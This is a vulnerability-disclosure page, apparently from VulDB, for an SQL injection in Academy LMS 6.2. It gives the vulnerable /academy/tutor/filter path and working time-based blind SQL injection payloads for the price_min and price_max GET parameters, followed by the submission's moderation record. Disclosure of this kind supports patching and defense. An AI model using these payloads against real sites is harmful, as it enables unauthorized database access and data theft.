제출 #200991: Academy LMS 6.2 - SQL Injection정보

제목Academy LMS 6.2 - SQL Injection
설명# Exploit Title: Academy LMS 6.2 - SQL Injection # Exploit Author: skalvin aka (CraCkEr) # Date: 29/08/2023 # Vendor: Creativeitem # Vendor Homepage: https://creativeitem.com/ # Software Link: https://demo.creativeitem.com/academy/ # Tested on: Windows 10 Pro # Impact: Database Access ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /academy/tutor/filter GET parameter 'price_min' is vulnerable to SQL Injection GET parameter 'price_max' is vulnerable to SQL Injection https://website/academy/tutor/filter?searched_word=&searched_tution_class_type%5B%5D=1&price_min=[SQLi]&price_max=[SQLi]&searched_price_type%5B%5D=hourly&searched_duration%5B%5D=0 --- Parameter: price_min (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 Parameter: price_max (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searched_word=&searched_tution_class_type[]=1&price_min=1&price_max=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&searched_price_type[]=hourly&searched_duration[]=0 --- [-] Done
사용자
 skalvin (UID 49463)
제출2023. 08. 29. AM 12:26 (3 연령 ago)
모더레이션2023. 09. 14. PM 09:44 (17 days later)
상태수락
VulDB 항목239750 [Academy LMS 6.2 GET Parameter /academy/tutor/filter price_min/price_max SQL 주입]
포인트들17

Do you want to use VulDB in your project?

Use the official API to access entries easily!